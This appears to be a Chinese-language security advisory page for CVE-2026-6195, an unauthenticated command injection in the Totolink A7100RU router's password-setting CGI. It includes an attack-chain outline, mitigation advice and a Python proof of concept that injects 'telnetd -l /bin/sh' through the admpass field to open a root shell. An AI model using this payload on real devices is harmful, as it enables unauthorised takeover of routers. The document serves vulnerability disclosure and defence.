IPBUF安全漏洞报告
English
CVE-2026-6195 CVSS 9.8 严重

CVE-2026-6195 Totolink A7100RU OS命令注入漏洞

披露日期: 2026-04-13

漏洞信息

漏洞编号
CVE-2026-6195
漏洞类型
OS命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Totolink A7100RU

相关标签

OS Command InjectionRCETotolinkIoTRouterCVE-2026-6195Critical

漏洞概述

Totolink A7100RU路由器在版本7.4cu.2313_b20191024中存在严重的远程代码执行漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中setPasswordCfg函数的参数admpass未经过滤直接传给系统命令。由于无需用户交互和身份认证,远程攻击者可利用此漏洞在服务器上执行任意系统命令,获取最高权限,从而完全控制受影响的设备,严重威胁网络安全。

技术细节

该漏洞位于Totolink A7100RU路由器的Web管理接口/cgi-bin/cstecgi.cgi中。具体受影响的功能模块是`setPasswordCfg`,主要用于修改管理员账户密码。在处理HTTP POST请求时,后台程序未对用户提交的`admpass`参数进行严格的边界检查和安全过滤,直接将其拼接到底层Shell系统命令中执行。攻击者可以通过构造特制的HTTP数据包,在`admpass`字段中注入恶意的Shell元字符(例如分号`;`、管道符`|`、或反引号`` ` ``)。由于路由器CGI服务通常以Root最高权限运行,注入的恶意命令将立即被系统执行。攻击者无需登录认证即可远程发起攻击,成功利用此漏洞可获取设备的完全控制权,执行任意系统指令,导致设备被接管、敏感数据泄露或服务拒绝等严重后果。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别出运行Totolink A7100RU路由器且固件版本为7.4cu.2313_b20191024的目标设备。
STEP 2
漏洞利用
攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送特制的HTTP POST请求,在setPasswordCfg函数的admpass参数中注入恶意Shell命令。
STEP 3
命令执行
由于后端未过滤输入,将恶意参数拼接到系统命令中执行,导致攻击者注入的命令(如开启Telnet、反弹Shell)在设备上以Root权限运行。
STEP 4
建立控制
攻击者获得设备的Shell访问权限,可以进一步植入后门、窃取配置信息或发动进一步的网络攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" # Headers to mimic a browser headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } # Payload data injecting a command (e.g., telnet enable or reboot) # The payload exploits the 'admpass' parameter in 'setPasswordCfg' data = { "function": "setPasswordCfg", "admpass": "admin; telnetd -l /bin/sh" # Injecting command to start telnet } try: response = requests.post(url, headers=headers, data=data, timeout=5) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Body: {response.text}") except Exception as e: print(f"[-] Error occurred: {e}")

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施
建议用户立即检查路由器固件版本,若为受影响版本,请务必将路由器管理界面置于内网环境,禁止通过互联网直接访问。同时应密切关注Totolink官网的安全公告,下载并安装修复了该命令注入漏洞的最新固件。在未完成升级前,建议暂时关闭路由器的远程管理功能,并配置ACL规则严格限制访问源。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表